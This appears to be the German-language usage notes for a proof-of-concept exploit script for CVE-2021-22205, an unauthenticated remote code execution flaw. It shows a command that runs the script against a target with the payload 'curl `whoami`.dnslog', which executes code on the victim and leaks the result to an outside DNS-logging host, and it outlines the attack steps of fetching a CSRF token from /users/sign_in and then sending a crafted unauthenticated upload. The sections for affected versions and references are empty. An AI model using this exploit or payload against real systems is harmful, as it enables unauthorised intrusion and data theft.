
CVE-2021-22205 Unbefugte RCE
Betroffene Versionen:
Verwendung
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

CSRF-Token abrufen:

Über /users/sign_in wird das CSRF-Token abgerufen. Anschließend wird mit dem zuvor genannten CVE-2021-22205-PoC ein Upload-Paket erstellt, um eine nicht authentifizierte Upload-Anfrage auszuführen, was letztendlich zu RCE führt.


Referenzen: